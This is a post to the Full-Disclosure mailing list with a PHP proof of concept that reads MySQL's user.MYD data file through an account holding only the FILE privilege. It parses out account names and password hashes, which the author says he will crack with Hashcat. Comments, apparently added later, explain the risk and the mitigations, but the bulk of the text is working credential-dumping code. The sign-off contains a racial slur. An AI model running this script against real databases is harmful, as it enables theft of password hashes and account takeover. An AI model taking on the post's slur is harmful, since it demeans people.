
Re: [Full-disclosure] MySQL (Linux) Database Privilege Elevation Zeroday Exploit



Hi all,

wrote some shitcode for MySQL user & hash enumeration when having the FILE privilege. Surely you could do it with a simple bash one-liner using mysql+grep+sed, but we're not going the easy way, right?

the first thought was "hey, what about changing root password directly in file user.MYD?" but then the MySQL manual (on SELECT ... INTO OUTFILE, the only file write FILE gives you) says:
file_name cannot be an existing file, which among other things prevents files such as /etc/passwd and database tables from being destroyed.

anyway we have Nvidia cards and Hashcat.


Cheers,

Kai
<?php
# Proof of concept posted to Full-Disclosure: dumps the MySQL account table
# (user.MYD) through an account that holds only the FILE privilege and has no
# access to the `mysql` database itself. It LOAD DATA INFILE-s the raw MyISAM
# data file into a scratch table, hex-dumps the result and then picks user
# names and password hashes out of the dump with a guessed row delimiter.
#
# Defender's view: the FILE privilege lets the account read any file the
# mysqld process can read, including the server's own data directory, so
# granting FILE amounts to granting read access to every table's data file
# (and to the password hashes in mysql.user). Mitigations: do not grant FILE
# to application accounts; confine LOAD DATA INFILE / INTO OUTFILE with the
# secure_file_priv server variable (a dedicated directory, or empty to
# disable server-side file access); keep the datadir readable only by the
# mysqld user. The DROP TABLE / CREATE TABLE / LOAD DATA INFILE sequence on
# an otherwise unused table is an easy pattern to flag in the general or
# audit log.
#
# Note: the mysql_* extension used here was deprecated in PHP 5.5 and removed
# in PHP 7, so this listing only runs on PHP 5. Several statements below were
# wrapped onto two lines by the mailing list; the wraps fall inside string
# literals or between tokens, so they still parse, but the embedded newline
# ends up inside the error message or the SQL text.
// (the original comment on this line was mis-encoded beyond recovery)
$host="localhost"; 
$port="3306";
$db="loltest"; # db for loading file contents. $user must have privileges to write in it:
## mysql -u root -p
## create database loltest;
## create user "loltest"@"localhost" identified by "asdasdasdasd";
## grant all privileges on loltest.* to "loltest"@"localhost";
## grant FILE on *.* to "loltest"@"localhost";
## flush privileges;
$user="loltest"; # user with FILE privilege
$pass="asdasdasdasd";
$file="/var/lib/mysql/mysql/user.MYD"; # change to correct path if it differs
echo "-> connecting.. ";
$link=mysql_connect("".$host.":".$port."",$user,$pass) or die("cant connect: 
".mysql_error()."\n");
echo "OK\n-> trying to select `mysql` db.. ";
# Sanity check: the PoC is only meaningful for an account that cannot open
# the `mysql` database directly. die(11) uses the integer as the exit status.
$rez=mysql_select_db("mysql");
if (!$rez) {
 echo "OK, \$user $user has no access to `mysql`, proceeding..\n";
} else {
 echo "\$user $user has access to `mysql`!\n"; # so why do you need this "exploit"?
 die(11);
}
echo "-> selecting db.. ";
mysql_select_db($db) or die ("cannot select db: ".mysql_error()."\n");
echo "OK\n-> trying to drop old table.. ";
# A failed DROP is only reported, not fatal (the table may simply not exist).
$rez=mysql_query("DROP TABLE file;");
if (!$rez) { echo "cannot drop table: ".mysql_error()."\n"; }
echo "OK\n-> creating table.. ";
# Scratch table with a single LONGBLOB column to receive the raw file bytes.
mysql_query("CREATE TABLE `file` ( `text` LONGBLOB NOT NULL );") or die 
("cannot create table: ".mysql_error()."\n");
echo "OK\n-> reading file $file.. ";
# Server-side read of $file (requires FILE). The empty LINES TERMINATED BY is
# presumably meant to pull the whole file into as few rows as possible -- not
# verified here.
mysql_query('LOAD DATA INFILE "'.$file.'" INTO TABLE file LINES TERMINATED BY 
"" (`text`);') or die ("cannot load data: ".mysql_error()."\n");
$rez=mysql_query("SELECT * FROM file;");
if (!$rez) { echo "fail. no FILE permission?\n"; }
else {
 # $name is computed but never used afterwards.
 for ($i=0;$i<mysql_num_fields($rez);$i++) {$name = mysql_field_name($rez,$i);}
 $data="";
 # Concatenate every fetched row (fields joined with CRLF) into one string.
 while ($row = mysql_fetch_array($rez, MYSQL_ASSOC)) {$data .= join 
("\r\n",$row);}
 if (empty($data)) {
  echo "file does not exists or empty?\n";
 } else {
  echo "OK\n-> result:\n";
  $hex = "";
  $plain = "";   # overwritten with an array further down; this value is unused
  # Hex dump: two uppercase hex digits per byte, each followed by a space.
  for ($i=0; $i<strlen($data); $i++) {
   $hex .= sprintf("%02X",ord($data[$i]))." ";
  }
 } 
 mysql_free_result($rez);
 # Clean up the scratch table so the next run's DROP succeeds.
 mysql_query("DROP TABLE file;") or die("cannot drop table: 
".mysql_error()."\n");
}
#echo " ------------- hex -------------\n".$hex."\n"; #debug
$plain=array();
# Heuristic row split on the hex dump: capture everything between a
# "FB 0F F?" marker and the next "01"/"02" byte. The marker is the author's
# guess at the MyISAM row delimiter (note the "(?)"), not a documented format.
preg_match_all("/FB 0F F. (.*?) 0(1|2) /s", $hex, $onlygood); # FB 0F F. = mysql row delimiter (?)
foreach ($onlygood[1] as $string) {
 $temp="";
 $charz=explode(" ",$string);
 # Byte-by-byte rendering: drop 0x01 and 0x1A, print 0x03-0x0F as a space,
 # prefix 0x2A ('*') with a space -- apparently so the hash, which begins
 # with '*' in the MySQL 4.1+ format, is separated from the preceding field --
 # and emit every other byte verbatim.
 foreach ($charz as $char) {
  switch ($char) {
   case "01": $temp .= ""; break;
   case "03": $temp .= " "; break;
   case "04": $temp .= " "; break;
   case "05": $temp .= " "; break;
   case "06": $temp .= " "; break;
   case "07": $temp .= " "; break;
   case "08": $temp .= " "; break;
   case "09": $temp .= " "; break;
   case "0A": $temp .= " "; break;
   case "0B": $temp .= " "; break;
   case "0C": $temp .= " "; break;
   case "0D": $temp .= " "; break;
   case "0E": $temp .= " "; break;
   case "0F": $temp .= " "; break;
   case "1A": $temp .= ""; break;
   case "2A": $temp .= " *"; break;
   default: $temp .= chr(hexdec($char));
  }
 }
 $plain[]=$temp;
}
echo " ------------- plain users -------------\n";
foreach ($plain as $lol) {
 echo $lol."\n";
}
mysql_close($link);
echo "\nbl1ng bl1ng n1gg4 :PppPpPPpPPPpP\n";